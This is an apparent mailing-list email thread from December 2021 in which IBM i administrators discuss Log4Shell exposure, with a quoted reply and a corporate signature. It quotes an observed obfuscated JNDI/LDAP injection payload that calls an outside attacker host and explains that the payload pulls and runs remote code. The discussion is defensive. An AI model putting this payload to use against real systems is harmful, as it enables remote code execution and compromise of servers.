This is the type of request that I'm seeing against an apache web server. Not vulnerable in itself, but suppose I'm running a java application under WAS. Logging either within my application or with WAS using a vulnerable log4j version.
${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}
That will cause the process doing the logging to make a connection to the server running at 45.146.164.160 and execute the java code that it gets back. That code could run a couple system checks and just report back what it finds. Logging and inventorying exploitable systems so that the attacker can loop back and make a more sophisticated attack latter. It could drop a small shell script in /tmp or the working directory of the app. It likely has write authority to those locations even if it is running under a profile like QTMHHTTP. That script could be a botnet node, a cryptominer, a web console.
Everyone is justifiably worked up about this because it allows remote code execution in a fairly trivial way, and the package that is being used in the exploit is very common in java applications. You know your software is safe, but my boss just knows we have software from vendor a, b, and c. He doesn't know if any of those vendors products use java and the affected library. So my job was to look at all the software we have on our system, and determine if we have exposure. In our case on the IBM i, we have the admin servers, and one other product, but it appears to use the old 1.x log4j. That presents it's own issues, but it's not exploitable by this attack.
FYI - this is who is 45.146.164.160 belongs to:
org-name: IT Resheniya LLC
org-type: OTHER
address: ul. Novoselov, d. 8A, of. 692
address: 193079 Saint Petersburg
address: Russia
On Wed, 2021-12-15 at 08:21 -0600, Brad Stone wrote:
Ya, I get this. I just find it funny I am getting all these emails from
customers asking me if my software is vulnerable (no java and no server
software, and if any web server is used it's the IBM apache which isn't
affected).
I don't think it's been explained well enough... it is complicated, yes,
but I think a good example would be the best description for those confused
by what's going on.
On Tue, Dec 14, 2021 at 5:38 PM Charles Wilt <charles.wilt@xxxxxxxxx<mailto:charles.wilt@xxxxxxxxx>> wrote:
[
https://www.medtronsoftware.com/img/MedtronMinilogo.bmp]
Kevin Bucknum
Senior Programmer Analyst
MEDDATA / MEDTRON
120 Innwood Drive
Covington LA 70433
Local: 985-893-2550<tel:985-893-2550>
Toll Free: 877-893-2550<tel:877-893-2550>
https://www.medtronsoftware.com
CONFIDENTIALITY NOTICE
This document and any accompanying this email transmission contain confidential information, belonging to the sender that is legally privileged. This information is intended only for the use of the individual or entity named above. The authorized recipient of this information is prohibited from disclosing this information to any other party and is required to destroy the information after its stated need has been fulfilled. If you are not the intended recipient, or the employee of agent responsible to deliver it to the intended recipient, you are hereby notified that any disclosure, copying, distribution or action taken in reliance on the contents of these documents is STRICTLY PROHIBITED. If you have received this email in error, please notify the sender immediately to arrange for return or destruction of these documents.
midrange.com
